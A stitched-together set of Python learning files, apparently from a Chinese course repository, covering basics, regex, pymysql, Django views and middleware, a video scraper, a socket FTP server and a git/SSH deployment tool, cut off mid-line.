func3(): # print(888) # ll = [func1,func2,func3] # for i in ll: # i() #分别执行每个函数 #函数名可以当成函数的返回值 # def func1(): # print(666) # def func2(argv): # print(777) # return argv # ret = func2(func1) ##func2执行 并且把func1传给了argv而argv又返回给了ret,所以ret=func1 # ret() #结果是777 666 #闭包 内层函数对外层函数非全局变量的引用,叫做闭包 # def wrapper(): # name1 = '老男孩' # def inner(): # print(name1) # inner() # print(inner.__closure__) ##如果返回是cell是闭包 # wrapper() # # name1 = '老男孩' # def wrapper(): # # def inner(): # print(name1) # inner() # print(inner.__closure__) ##返回none不是闭包 # wrapper() name = 'alex' def wrapper(argv): def inner(): print(argv) inner() print(inner.__closure__) # cell wrapper(name)<file_sep>/cmdb/auto_client - 7 - 资产信息入库/lib/log.py #!/usr/bin/python # -*- coding:utf-8 -*- import logging from config import settings class Logger(object): def __init__(self): self.log_file_path = settings.LOG_FILE_PATH file_handler = logging.FileHandler(self.log_file_path, 'a', encoding='utf-8') file_handler.setFormatter(logging.Formatter(fmt="%(asctime)s - %(name)s - %(levelname)s: %(message)s")) self.logger = logging.Logger('cmdb', level=logging.INFO) self.logger.addHandler(file_handler) def info(self,msg): self.logger.info(msg) def error(self,msg): self.logger.error(msg) logger = Logger()<file_sep>/day2/补充.py l1 = ['alex', 'wusir', 'taibai', 'barry', '老男孩'] #1 # del l1[1::2] # print(l1) # # for i in range(len(l1)): # print(l1) # ['alex', 'wusir', 'taibai', 'barry', '老男孩'] # # ['alex', 'wusir', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry', '老男孩'] # print(i) # 0 1 2 3 # if i % 2 == 1: # del l1[i] # print(l1) # ['alex', 'wusir', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry', '老男孩'] # # ['alex', 'taibai', 'barry'] # print(i) # 0 1 #再循环一个列表时,不要对列表进行删除的动作(改变列表元素的个数动作),会出错 #range 可定制的数字列表 # for i in range(10): # print(i) # for i in range(1,10): # print(i) # for i in range(1,10,2): # print(i) # for i in range(10,1,-1): # print(i) # print(range(10)) # for i in 
range(len(l1)-1,-1,-1): # if i % 2 == 1: # del l1[i] # print(l1) # dict 再循环字典时,不要改变字典的大小。 # dic = {'k1':'v1','k2':'v2','k3':'v3','r':666} # l1 = [] # for i in dic: # if 'k' in i: # l1.append(i) # # print(l1) # # for i in l1: # del dic[i] # print(dic) #tu 如果元组里面只有一个元素并且没有逗号隔开,那么他的数据类型与该元素一致。 # tu1 = (1) # print(tu1,type(tu1)) # tu2 = ('alex') # print(tu2,type(tu2)) # # tu3 = (['alex',1,2]) # print(tu3,type(tu3))<file_sep>/day15/python连接mysql/mysql_fetchone.py import pymysql # username=input('请输入用户名:') # pwd=input('请输入密码:') #连接数据库 conn = pymysql.connect(host='localhost',user='root',password='123',db='user') #创建游标 cursor=conn.cursor() #增 sql="select * from t1" rows=cursor.execute(sql) # res1=cursor.fetchone() #fetchone查看一行记录 # res2=cursor.fetchone() # res3=cursor.fetchone() # res4=cursor.fetchmany(2)#查看两行,以元祖形式出现 res5=cursor.fetchall()#查看所有记录 # print(res1) # print(res2) # print(res3) # print(res4) print(res5) #提交 conn.commit() #关闭游标 cursor.close() #关闭连接 conn.close() ''' ((1, 'egon', '123'), (2, 'hu', '123'), (3, 'root', '123456'), (4, 'lhf', '12356'), (5, 'eee', '156')) '''<file_sep>/day18/练习/mymiddleware.py ''' 自己定义的中间件 ''' from django.utils.deprecation import MiddlewareMixin from django.shortcuts import HttpResponse,render class MD1(MiddlewareMixin): def process_request(self, request): print("这是md1中的process_request方法") print(id(request)) request.s21 = "好" # return HttpResponse("呵呵1") # return render(request,"weihu.html") # # def process_response(self,request,response): # print("这是md1中的process_response方法") # return response # def process_view(self,request,view_func,view_args,view_kwargs): # print("=" * 120) # # print(view_func.__name__) # 查看名字 # # print(view_func.__doc__) # 查看文本注释 # # view_func(request) # # print("-" * 120) # print("这是md1中的process_view方法") # # return HttpResponse("啦啦") # # def process_template_response(self, request, response): # # # print("这是MD1中的process_template_response方法!") # return response # # # # class MD2(MiddlewareMixin): # def 
process_request(self, request): # print("这是md2中的process_request方法") # print(id(request)) # request.s21 = "好" # # return HttpResponse("呵呵2") # # def process_response(self, request, response): # print("这是md2中的process_response方法") # return response # # return HttpResponse("MD2-ressponse") # # def process_view(self,request,view_func,view_args,view_kwargs): # print("=" * 120) # # print(view_func.__name__) # # print(view_func.__doc__) # # view_func(request) # # print("-" * 120) # print("这是md2中的process_view方法") # # return HttpResponse("啦啦") # # def process_template_response(self, request, response): # print("这是MD2中的process_template_response方法!") # return response import time D={} class Xianzhi(MiddlewareMixin): def process_request(self,request): ip=request.META.get("PEMOTE_ADDR") now=time.time() if ip not in D: D[ip]=[] # print(D) history=D[ip] print(history) while history and now-history[-1] >10: # 当现在的访问时间跟最早的访问时间相差大于10秒的时候,则删除最早的访问时间 history.pop() if len(history)>=3: return HttpResponse("你在10秒之内访问次数已经超过三次") else: history.insert(0,now) <file_sep>/复习/迭代器和生成器.py # 这两个都是可迭代的,都会取到1,2,3 # lst_iter = [1,2,3].__iter__() # print(lst_iter.__next__()) # print(lst_iter.__next__()) # print(lst_iter.__next__()) # # # for i in [1,2,3]: # print(i) # print(dir({1,2})) # print(dir(123)) # print('__next__' in dir(range(12))) # print(dir(range(12))) #生成器 # 生成器函数的调用不会触发代码的执行,而是会返回一个生成器(迭代器) # 想要生成器函数执行,需要用next # # def cloth_g(num): # for i in range(num): # yield 'cloth%s'%i # # # g = cloth_g(1000) # print(next(g)) # print(next(g)) # print(next(g)) #send # def generator(): # print(123) # content = yield 1 # print('=======',content) # print(456) # yield 2 # # g = generator() # ret = g.__next__() # print('***',ret)#1 # ret = g.send('hello') #send的效果和next一样 # print('***',ret) #send 获取下一个值的效果和next基本一致 #只是在获取下一个值的时候,给上一yield的位置传递一个数据 #使用send的注意事项 # 第一次使用生成器的时候 是用next获取下一个值 # 最后一个yield不能接受外部的值 print([i**2 for i in range(30) if i%3 ==0])<file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 
固定二级菜单示例/web/urls.py from django.conf.urls import url,include from web.views import home urlpatterns = [ url(r'^add_user/', home.add_user), url(r'^add_order/', home.add_order), url(r'^user/', home.userlist), url(r'^orderlist/', home.orderlist), ] <file_sep>/day3/函数.py # def fun1(): # print(111) # return # print(3333) # fun1() ##函数的返回值 # s1 = "hello world" # def mylen(): # count = 0 # for i in s1: # count += 1 # return 555,444,count # ret1,ret2,ret3 = mylen() # print(ret1) # print(ret2) # print(ret3) ##函数的传参 # li = [1,2,3,4,'fdss','alex'] # s1 = 'dfdfdfd' # def my_len(a): ##函数的形参,可以随便写 # count = 0 # for i in a: # count += 1 # return count # print(my_len(li)) ##函数的实参 #实参分为:位置参数,关键字参数,混合参数 #位置参数 ##一一对应,按顺序 # def func1 (x,y): # print(x,y) # func1(1,2) # # ##关键字参数 # def func2 (x,y,z): # print(x,y,z) # func2(y=2,x=1,z=3) # # #混合参数 # def func3(argv1,argv2,argv3): # print(argv1) # print(argv2) # print(argv3) # func3(1,2,argv3=4) #形参分为:位置参数,默认参数,动态参数 # 位置参数 一一对应,按顺序来 # def func1(x,y): # print(x,y) # func1(1,2) ##默认参数 # def register(name,sex='男'): # with open('log1',encoding='utf-8',mode='a') as f1: # f1.write("{} {}\n".format(name,sex)) # register('aa') ##动态参数 *args **kwargs # def func2(*args,**kwargs): # print(args) ##打印成元组 # print(kwargs) ##打印成字典 # func2(1,2,2,3,4,5,'alex','老男孩',a='ww',b='qq') #三种参数的排序 # def func3(a,b,*args,sex='男'): ##顺序是 位置参数,*args ,默认参数 # print(a) # print(b) # print(sex) # print(args) # func3(1,2,'老男孩','alex',sex='女') # def func4(a,b,*args,sex='男',**kwargs): ##位置参数,*args,默认参数,**kwargs # print(a) # print(b) # print(args) # print(sex) # print(kwargs) # func4(1,2,3,'alex','aa',sex='女',name='alex') ##打散 # 函数的执行:* 打散功能 def func1(*args,**kwargs): print(args) print(kwargs) l1 = [1,2,3,4] l11 = (1,2,3,4) l2 = ['alex','wusir',4] func1(*l1,*l2,*l11) ##这个是以元组出现的 # def func1(*args,**kwargs): # print(args) # print(kwargs) # dic1 = {'name1':'alex'} # dic2 = {'name2':'wusir'} # func1(**dic1,**dic2) ##出来的结果是以字典形式存在的 <file_sep>/day5/re模块.py import re ret = 
re.findall('a','abc egon yuan') # 返回所有满足匹配条件的结果,放在列表里 print(ret) ##结果['a', 'a'] ret1 = re.search('\d+','8787abc 97897engo yuan657').group()#函数会在字符串内查找模式匹配,只到找到第一个匹配然后返回一个包含匹配信息的对象,该对象可以 # 通过调用group()方法得到匹配的字符串,如果字符串没有匹配,则返回None。 print(ret1) ##结果 8787 只匹配第一个数字 ret3=re.match('\d+','1abc78797 97897engo yuan657').group()# 同search,不过只能在字符串开始处进行匹配 print(ret3) # #ret4=re.match('a','bca').group() ##这种的就会报错 # # print(ret4) ret5=re.split('[ab]','abcd')#先按'a'分割得到''和'bcd',在对''和'bcd'分别按'b'分割 print(ret5) ##结果['', '', 'cd'] ret6 = re.sub('\d', 'H', 'eva3egon4yuan4', 1)##将数字替换成'H',参数1表示只替换1个 print(ret6) ret7 = re.subn('\d', 'H', 'eva3egon4yuan4')#将数字替换成'H',返回元组(替换的结果,替换了多少次) print(ret7) obj = re.compile('\d{3}') #将正则表达式编译成为一个 正则表达式对象,规则要匹配的是3个数字 ret8 = obj.search('abc123eeee') #正则表达式对象调用search,参数为待匹配的字符串 print(ret8.group()) ret = re.finditer('\d', 'ds3sy4784a') print(ret) print(ret.__next__().group()) print(next(ret).group()) #第二种取值方式 print([i.group()for i in ret]) ##findall优先级 ret = re.findall('www\.(oldboy|baidu)\.com', 'www.oldboy.com') ##这是因为findall会优先把匹配结果组里内容返回,如果想要匹配结果取消优先级 print(ret)##结果是oldboy ret = re.findall('www\.(?:baidu|oldboy)\.com', 'www.oldboy.com') print(ret) # ['www.oldboy.com'] ##split优先级查询 ret = re.split("\d+",'eva3egon4yuan') print(ret) ret = re.split('(\d+)','eva3egon4yuan') print(ret) ##在匹配部分加上()之后所切出的结果是不同的, #没有()的没有保留所匹配的项,但是有()的却能够保留了匹配的项, #这个在某些需要保留匹配部分的使用过程是非常重要的<file_sep>/auto_server/api/urls.py from django.conf.urls import url from . 
import views urlpatterns=[ url(r'^server.html$',views.server) ]<file_sep>/day7/student_guanlisystem/core/student.py class Foo: def __repr__(self): show_str='' for key in self.__dict__: show_str+='%s:%s'%(key,self.__dict__[key]) return show_str class Student(Foo): def __init__(self,name): self.name=name def student(): Operate_lst = [('查看自己的班级', 'show_courses'), ('查看自己的课程', 'create_class'), ]<file_sep>/day26/pearvideo/pearvideo.py #需求,去批量下载梨视频 import requests from selenium import webdriver from selenium.webdriver.chrome.options import Options from lxml import etree import re # 创建一个无头谷歌浏览器 chrome_options = Options() chrome_options.add_argument('--headless') chrome_options.add_argument('--disable-gpu') # 驱动路径 path = r'D:\python21\python\day26\selenium自动化操作\chromedriver_win32\chromedriver.exe' # 创建浏览器对象 browser = webdriver.Chrome(executable_path=path, chrome_options=chrome_options) # 浏览器打开url browser.get(url="http://www.pearvideo.com/category_59") # 让滚轮向下滑动,加载更多的数据执行js js = "window.scrollTo(0,document.body.scrollHeight)" browser.execute_script(js) # 获取页面圆满数据,进行解析 page_text = browser.page_source # page_source可以获得当前浏览器对应的页面数据,不需要用request # 使用xpath去进行解析操作 tree = etree.HTML(page_text) li_list = tree.xpath('//*[@id="categoryList"]/li') # print(li_list) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } for li in li_list: secondPage_url = "http://www.pearvideo.com/" + li.xpath('./div/a/@href')[0] # 对上述url发起请求,获取二级页面的页面数据 page_text = requests.get(url=secondPage_url, headers=headers).text video_url = re.findall('srcUrl="(.*?)",', page_text, re.S)[0] #使用正则去匹配url videoData = requests.get(url=video_url, headers=headers).content fileName = video_url.split('/')[-1] with open(fileName, 'wb') as fp: fp.write(videoData) print(fileName + '已经被下载完毕') <file_sep>/day9/进程/事件.py # 事件内部内置了一个标志 # wait 方法 如果这个标志是True,那么wait == pass # wait 方法 如果这个标志是False,那么wait就会陷入阻塞,一直阻塞到标志从False变成True # 一个事件在创建之初 
内部的标志默认是False # Flase -> True set() # True -> False clear() # 红绿灯模型 from multiprocessing import Process, Event import time, random def car(e, n): while True: if not e.is_set(): # 进程刚开启,is_set()的值是Flase,模拟信号灯为红色 print('\033[31m红灯亮\033[0m,car%s等着' % n) e.wait() # 阻塞,等待is_set()的值变成True,模拟信号灯为绿色 print('\033[32m车%s 看见绿灯亮了\033[0m' % n) time.sleep(random.randint(3, 6)) if not e.is_set(): #如果is_set()的值是Flase,也就是红灯,仍然回到while语句开始 continue print('车开远了,car', n) break def traffic_lights(e, inverval): while True: time.sleep(inverval) # 先睡3秒 if e.is_set(): # 标志是True print('######', e.is_set()) e.clear() # ---->将is_set()的值设置为False else: # 标志是False e.set() # ---->将is_set()的值设置为True print('***********',e.is_set()) if __name__ == '__main__': e = Event() #e就是事件 t = Process(target=traffic_lights, args=(e, 3)) # 创建一个进程控制红绿灯 for i in range(10): p=Process(target=car,args=(e,i,)) # 创建10个进程控制10辆车 p.start() t.start() print('============》') # 10个进程 模拟车 :车的行走要依靠当时的交通灯 # 交通灯是绿灯 车就走 # 交通灯是红灯 车就停 停到灯变绿 # wait 来等灯 # set clear 来控制灯 <file_sep>/day6/练习.py ''' class 类名: 静态属性 = 123 def 动态属性(self): # 在类中的方法的一个默认的参数,但也只是一个形式参数,约定必须叫self print('-->',self) print(类名.静态属性)#查看静态属性 类名.静态属性=456 print(类名.静态属性) #修改静态属性 类名.静态属性2='abc' #增加静态属性 print(类名.静态属性2) del 类名.静态属性2 #删除静态属性 print(类名.动态属性) 类名.动态属性("我要把1传给动态属性self") #这个1传给了self #print(类名.静态属性2) ''' #类的第二个功能实例化(创造一个具体的对象) ''' class Person:pass alex=Person() #对象=类名() 也叫实例化 print(alex) #对象 print(Person) #类 print(alex.__dict__) #默认是空字典 alex.__dict__['name']='alex' # 给alex对象添加属性 alex.sex='男' #给alex对象添加属性 print(alex.__dict__) ''' ''' class Person: def __init__(self,name,sex,dps,hp): self.name=name self.sex=sex self.dps=dps self.hp=hp def attack(self,dog): # 人打狗 dog.hp-=self.dps print('%s打了%s,%s还剩%s点血'% (self.name,dog.name,dog.name,dog.hp)) class Dog: def __init__(self,name,kind,hp,dps): self.name=name self.kind=kind self.hp=hp self.dps=dps def bite(self,person):#狗咬人 person.hp -= self.dps print('%s咬了%s,%s还剩%s点血'% (self.name,person.name,person.name,person.hp)) alex = 
Person('alex','男',250,5) ha2 = Dog('小白','藏獒',1000,200) ha2.bite(alex) #alex.attack(ha2) #第一种写法 # 对象名.方法名 相当于调用一个函数,默认把对象名作为第一个参数传入函数 alex调用了attack函数 Person.attack(alex,ha2)#第二种写法 print(ha2.hp) ''' #已知半径计算园的面积 # from math import pi # class Yuan: # def __init__(self,r): # self.r=r # def Yuan_mianji(self): # # return pi *self.r **2 # def Yuan_zc(self): # # return pi * 2*self.r # yuan = Yuan(3) # mj=yuan.Yuan_mianji() # #mj1=Yuan.Yuan_mianji(yuan) # zc=yuan.Yuan_zc() # print('我是面积%s\n我是周长%s'%(mj,zc)) #小练习 # class action: # def __init__(self,name,age,sex,zuo): # self.name=name # self.age=age # self.sex=sex # self.zuo=zuo # def attack(self): # print(self.name,self.age,self.sex,self.zuo) # xm=action('小明,','10岁,','男,','上山去砍柴') # li=action('老李,','50岁,','男,','开车去东北') # xm.attack() # li.attack() #命名空间 # 类有自己的命名空间 # 对象也有自己的命名空间 # 对象能访问类的命名空间 # 类不能访问对象的命名空间 class Person: COUNTRY = ['中国人'] # 静态属性 country = '中国人' def __init__(self,name): self.name = name def eat(self): print('%s在吃泔水'%self.name) alex = Person('alex') egon = Person('egon') # print(alex.name) # print(alex.country) # alex.country='印度人' #这个只是在alex这个对象里面生效 # print(alex.country) # print(egon.country) # print(Person.country) # Person里面的没有改过来 # alex.COUNTRY[0] = '印度人' # 如果是列表就整体都改了 # print(alex.COUNTRY) # print(egon.COUNTRY) # print(Person.COUNTRY) alex.COUNTRY=['印度人'] print(egon.COUNTRY) #中国人 print(Person.COUNTRY) #中国人 print(alex.COUNTRY) ''' #结论 # 在访问变量的时候,都先使用自己命名空间中的,如果自己的空间中没有,再到类的空间中去找 # 在使用对象修改静态变量的过程中,相当于在自己的空间中创建了一个新的变量 # 在类的静态变量的操作中 应该使用类名来直接进行操作 就不会出现乌龙问题 #创建一个类计算创建了多少个实例 # class lei: # count = 0 # def __init__(self): # lei.count +=1 # f1=lei() # # print(lei.count) <file_sep>/day2/集合.py ''' 集合: 无序,不重复的数据类型。它里面的元素必须是可哈希的。但是集合本身是不可哈希的。 1:关系测试。交集并集,子集,差集.... 
2,去重。(列表的去重) ''' l1 = [1,1,2,2,3,3,4,5,6,6] ##去除重复 l2 = list(set(l1)) print(l2) #增 set1 = {'alex','wusir','ritian','egon','barry'} set1.add('999') print (set1) set1.update('abc') print (set1) #打印结果是'alex', 'ritian', 'b', '999', 'a', 'c', 'egon', 'barry', 'wusir'} #删 #remove set1.remove('egon') print (set1) # #pop # set1.pop() ##随机删除不能指定 # print (set1) #clear set1.clear() print (set1)<file_sep>/deploy/web/views/depart.py from django.shortcuts import render, HttpResponse, redirect from web.forms.depart import DepartModelForm from web import models from web.utils.pager import Pagination # 分页功能 from web.utils.urls import memory_reverse def depart_list(request): """ 部门列表 :param request: :return: """ # 要查看的页码 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Department.objects.all().count() # 数据库中获取即可 pager = Pagination(page, total_count, request.path_info) # 调用Pagination类 # 页面上面显示的数据 depart_queryset = models.Department.objects.all()[pager.start:pager.end] return render(request, 'depart_list.html', {'depart_queryset': depart_queryset, 'pager': pager}) def depart_add(request): """ 添加部门 :param request: :return: """ if request.method == 'GET': form = DepartModelForm() return render(request, 'form.html', {'form': form}) form = DepartModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request, 'depart_list')) return render(request, 'form.html', {'form': form}) def depart_edit(request, nid): """ 编辑部门 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Department.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = DepartModelForm(instance=obj) return render(request, 'form.html', {'form': form}) # 带默认值 form = DepartModelForm(data=request.POST, instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request, 'depart_list')) return render(request, 'form.html', {'form': form}) def depart_del(request, nid): """ 删除部门 :param request: 
:param nid: :return: """ origin = memory_reverse(request, 'depart_list') # 代表的是一个url的地址 if request.method == 'GET': # 如果删除的时候,点取消就返回下面的页面 return render(request, 'delete.html', {'cancel': origin}) # 把origin传到删除页面,从而点取消之后返回相应页面 models.Department.objects.filter(id=nid).delete() return redirect(origin) <file_sep>/day19/CMS/fault_reporting/models.py from django.db import models from django.contrib.auth.models import AbstractUser # Create your models here. class UserInfo(AbstractUser): phone=models.CharField(max_length=11) avatar=models.FileField(upload_to="avatars/",default="avatars/default.png") <file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/main_board.py #!/usr/bin/env python # -*- coding:utf-8 -*- import os import traceback from .base import BasePlugin from lib.response import BaseResponse from lib.log import logger class MainBoard(BasePlugin): def win(self, handler, hostname): raise NotImplementedError('win must be implemented ') def linux(self, handler, hostname): response = BaseResponse() try: if self.debug: from config.settings import BASEDIR output = open(os.path.join(BASEDIR, 'files/board.out'), 'r').read() else: shell_command = "sudo dmidecode -t1" output = handler.cmd(shell_command,hostname) response.data = self.parse(output) except Exception as e: msg = traceback.format_exc() response.status = False response.error = msg logger.error(msg) return response.dict def parse(self, content): result = {} key_map = { 'Manufacturer': 'manufacturer', 'Product Name': 'model', 'Serial Number': 'sn', } for item in content.split('\n'): row_data = item.strip().split(':') if len(row_data) == 2: if row_data[0] in key_map: result[key_map[row_data[0]]] = row_data[1].strip() if row_data[1] else row_data[1] return result<file_sep>/day8/ftp作业/get_server.py import socket import os import json import struct import configparser SHARE_DIR=r'D:\python21\day8\ftp作业\sharedir' user_status = { 'username': None, 'status': False } class FtpServer: def __init__(self,host,port): 
self.host=host self.port=port self.server=socket.socket() self.server.bind((self.host,self.port)) self.server.listen() def register_login(self): config = configparser.ConfigParser() config.read('userinfo') user = config.sections() while True: print('server start') self.conn, self.client_addr = self.server.accept() print(self.client_addr) while True: ret=json.loads(self.conn.recv(1024).decode('utf-8')) print(ret) username = ret[0] print(username) pwd = ret[1] print(pwd) for i in user: if i == username and config[username]['md5_pwd'] == pwd: self.conn.send('true'.encode('utf-8')) user_status['status'] = True else: self.conn.send('你输入的用户名或密码错误'.encode('utf-8')) self.conn.close() self.server.close() def run(self): print('server starting...') while True: self.conn,self.client_addr=self.server.accept() print(self.client_addr) while True: try: data=self.conn.recv(1024) #params_json.encode('utf-8') if not data:break params=json.loads(data.decode('utf-8')) #params=['get','a.txt'] cmd=params[0] # if hasattr(self,cmd): func=getattr(self,cmd) #对象 func(params) else: print('\033[45mcmd not exists\033[0m') except ConnectionResetError: break self.conn.close() self.server.close() def get(self,params): #params=['get','a.txt'] filename=params[1] #filename='a.txt' filepath=os.path.join(SHARE_DIR,filename) # if os.path.exists(filepath): #1、制作报头 headers = { 'filename': filename, 'md5': '123sxd123x123', 'filesize': os.path.getsize(filepath) } headers_json = json.dumps(headers) headers_bytes = headers_json.encode('utf-8') #2、先发报头的长度 self.conn.send(struct.pack('i',len(headers_bytes))) #3、发送报头 self.conn.send(headers_bytes) #4、发送真实的数据 with open(filepath,'rb') as f: for line in f: self.conn.send(line) def put(self): pass if __name__ == '__main__': server=FtpServer('127.0.0.1',8080) server.register_login() <file_sep>/day4/作业测试.py # cmd = "update name='bob' from userinfo where age=25" # a=cmd.split('from')[0].split()[1].split('=')[1].strip("'") # print(a) # insert = "insert into userinfo 
('name','age') values ('jack','23')" # b = insert.split('values')[1].split()[0] # print(b) # b = [i.strip().strip(",") for i in a] # print(b) # b= ['3', 'nezha', '25', '1333235322', 'IT'][1] # print(b) ''' ##查询语句 select id ,name, age from userinfo where age>22 select * from userinfo where age>22 select * from userinfo where age=25 select * from userinfo where phone like 133 ##下面这个不行 select * from userinfo where job=IT ''' ##更改语句 # update name='bob' from userinfo where age=25 # cmd = 'select * from userinfo' # a = cmd.split('from')[0].split()[1:] # if a==['*']: # print('ok') # else: # print('bad') ##删除语句 # left_yuju="delete name='bob' from userinfo where age=25" # # filter_cols = left_yuju.split('from')[0].split()[1].split('=') # print(filter_cols) dic = {'id':['1','2','3','4','5']} b = int(dic.get('id')[-1])+1 # print(b) a = [' 5', 'hnf', '23', '123456789', 'python'] print(type(a[0])) a[0]=b print(a) # with open('userinfo',encoding='utf-8',mode='a')as f1: # for i in a: # f1.write(i)<file_sep>/deploy/web/views/deploy.py import os import shutil import traceback import paramiko from io import StringIO import subprocess from django.http import JsonResponse from django.shortcuts import render, HttpResponse, redirect from django.conf import settings from web.forms.deploy import DeployModelForm, DeployPushForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def deploy_list(request, project_id): """ 部署任务列表 :param request: :param project_id: :return: """ page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Deploy.objects.filter(project_id=project_id).count() # 数据库中获取即可 pager = Pagination(page, total_count, request.path_info) depart_queryset = models.Deploy.objects.filter(project_id=project_id)[pager.start:pager.end] project = models.Project.objects.filter(id=project_id).first() return render(request, 'deploy_list.html', {'depart_queryset': depart_queryset, 'pager': pager, 'project': project}) def 
deploy_add(request, project_id): """ 添加任务 :param request: :param project_id: :return: """ if request.method == 'GET': form = DeployModelForm() return render(request, 'form.html', {'form': form}) form = DeployModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.instance.project_id = project_id form.save() return redirect(memory_reverse(request, 'deploy_list', project_id=project_id)) return render(request, 'form.html', {'form': form}) def deploy_edit(request, project_id, nid): """ 编辑 :param request: :param nid: 当前要编辑的项目id :return: """ obj = models.Deploy.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = DeployModelForm(instance=obj) return render(request, 'form.html', {'form': form}) # 带默认值 form = DeployModelForm(data=request.POST, instance=obj) if form.is_valid(): form.instance.project_id = project_id form.save() return redirect(memory_reverse(request, 'deploy_list', project_id=project_id)) return render(request, 'form.html', {'form': form}) def deploy_del(request, project_id, nid): """ 删除 :param request: :param nid: :return: """ origin = memory_reverse(request, 'deploy_list', project_id=project_id) if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.Deploy.objects.filter(id=nid).delete() return redirect(origin) def deploy_fetch(request, project_id, deploy_id): """ 点击上线按钮执行的代码 :param request: :param project_id: 项目id :param deploy_id: 部署id :return: """ # print(request.user.git_name) # print(request.user.git_pwd) # 部署的是那个项目 deploy_object = models.Deploy.objects.filter(id=deploy_id, project_id=project_id).first() # 下载代码所在路径 deploy_object.project.title 项目名 deploy_object.version项目版本 cwd_path = os.path.join(settings.BASE_DIR, 'codes', deploy_object.project.title, deploy_object.version) # print(cwd_path) # 1. 
获取代码 仓库地址 + 版本 + subprocess def get_code(): # 判断代码存放路径是否存在,遇到的问题是删除不了目录 project_path = os.path.join(cwd_path, deploy_object.project.title) if os.path.exists(project_path): # 如果存在就删除,不然不能下载代码 shutil.rmtree(project_path) # 判断仓库是否私有 if deploy_object.project.private: protcal, addr = deploy_object.project.git.split("//", maxsplit=1) git_addr = "%s//%s:%s@%s" % (protcal, request.user.git_name, request.user.git_pwd, addr) else: git_addr = deploy_object.project.git # 克隆仓库到本地,-b指定版本 # cmd = "git clone -b %s %s" % (deploy_object.version, git_addr) cmd = "git clone %s" % (git_addr) if not os.path.exists(cwd_path): # 如果存放代码的目录不存在,就创建 os.makedirs(cwd_path) subprocess.check_call(cmd, shell=True, cwd=cwd_path) get_code() # 2. 编译代码 def compile_code(): pass compile_code() # 3.打包文件 def package_code(): import shutil import time ctime = time.strftime('%Y%m%d%H%M%S') # 时间戳 project_code_path = os.path.join(cwd_path, deploy_object.project.title) # 项目所在路径 file_name = "%s%s" % (deploy_object.project.title, ctime) # 文件名字 zip_file_path = os.path.join(cwd_path, file_name) # 压缩之后文件的名字 shutil.make_archive(base_name=zip_file_path, format='zip', root_dir=project_code_path) # 压缩成zip格式 return file_name + '.zip' zip_file_name = package_code() deploy_object.uid = zip_file_name # 上线文件包名称 deploy_object.status = 2 deploy_object.save() response = { 'code': True, 'status': deploy_object.get_status_display(), # 显示status_choice类型的中文名字 'uid': zip_file_name # 文件名 } print(project_id) return JsonResponse(response) # return redirect(memory_reverse(request, 'deploy_list', project_id=project_id)) def deploy_push(request, project_id, deploy_id): """ 推送代码,发布按钮执行的代码 :param request: :param project_id: 项目id :param deploy_id: 任务id :return: """ deploy_object = models.Deploy.objects.filter(id=deploy_id, project_id=project_id).first() if request.method == 'GET': # 1. 显示发布信息 # 2. 
用户选择主机 # 通过deploy跨project表,然后在跨到hosts表,去查询主机 all_host_list = deploy_object.project.hosts.all() # 显示所有关联这个项目的主机 deployed_host_list = models.DeployRecord.objects.filter(deploy=deploy_object) # 这个项目里已经发布过的主机 deployed_host_dict = {item.host_id: item for item in deployed_host_list} # 主机id:主机名 # form = DeployPushForm(deploy_object.project) return render(request, 'deploy_push.html', {'deploy_object': deploy_object, 'all_host_list': all_host_list, 'deployed_host_dict': deployed_host_dict}) host_id_list = request.POST.getlist('hosts') # 获取前端页面给选中的主机的id hosts是前端name的值 host_list = models.Host.objects.filter(id__in=host_id_list) from concurrent.futures import ThreadPoolExecutor def task(host_object, deploy_object): cwd_path = os.path.join(settings.BASE_DIR, 'codes', deploy_object.project.title, deploy_object.version) # 存放路径 # 1. 在DeployRecord中创建一条发布任务 def create_deploy_record(): status = False try: record_object = models.DeployRecord.objects.get_or_create(deploy=deploy_object, host=host_object, host_version=deploy_object.version) status = True return record_object except Exception as e: record_object.log = traceback.format_exc() record_object.save() return status record_object, is_new = create_deploy_record() # 调用这个函数 # 2 推送 def push_code(): status = False try: private_key = paramiko.RSAKey(file_obj=StringIO(request.user.server_private_key)) # 获取用户私钥 transport = paramiko.Transport((host_object.hostname, host_object.ssh_port)) # 主机名和端口号 transport.connect(username=request.user.server_name, pkey=private_key) # 用户名和私钥 # 用户远程上传下载文件 sftp = paramiko.SFTPClient.from_transport(transport) # 远程执行命令 ssh = paramiko.SSHClient() ssh._transport = transport # 创建目录 code_file_path = os.path.join(cwd_path, deploy_object.uid) # 存放代码的目录 target_folder_path = '/home/yx/codes/%s/%s/' % ( deploy_object.project.title, deploy_object.version) stdin, stdout, stderr = ssh.exec_command('mkdir -p %s' % target_folder_path) stdout.read() # 上传代码到服务器 target_file_path = os.path.join(target_folder_path, 
